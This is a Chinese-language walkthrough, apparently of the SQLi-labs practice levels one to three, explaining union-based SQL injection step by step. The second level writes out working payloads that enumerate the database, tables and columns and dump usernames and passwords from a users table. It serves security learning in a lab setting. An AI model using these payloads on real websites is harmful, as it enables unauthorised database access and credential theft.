第一关
1.判断是字符型还是数字型
加单引号看看
报错,我们看到报错,添加--+正常显示判断是字符型报错
2.判断列数
3不报错
4报错,证明是有3列
3.判断回显点
发现2,3为回显点
4.查询数据库
5.查询当前数据库中的表![](https://i-blog.csdnimg.cn/direct/d900d6b9d3ab4e50aae5250cd613ab6d.png)
6.查询当前users表中的列![](https://i-blog.csdnimg.cn/direct/67c8256acacd47af8dda99ad8c9a0444.png)
7.查询users表中的内容
每个字段中间加个~可以让数据分开好看.
第二关
1.同样我们还判断注入类型
?id=1 and 1=1
?id=1 and 1=2
可见是数字型注入
2.判断列数
order by 3
order by 4
同样的还是只有三列
3.判断回显
?id=-1 union select 1,2,3
回显同样为2,3
4.查看数据库
?id=-1 union select 1,2,database()
5.查询当前数据库中的表
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
6.查看users表中的列
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'
7.查看users表中的数据
?id=-1 union select 1,2,group_concat(id,'~',username,'~',password) from users
第三关
1.判断注入类型
这里输入单引号括号实现闭合,故此是字符型
2.判断列数
所以这里有三列
3.判断回显点
2,3为回显带点
4.查询数据库
5.查看当前数据库下的表
6.查看users表中的列
7.查看users表中的数据
第四关
等后续加载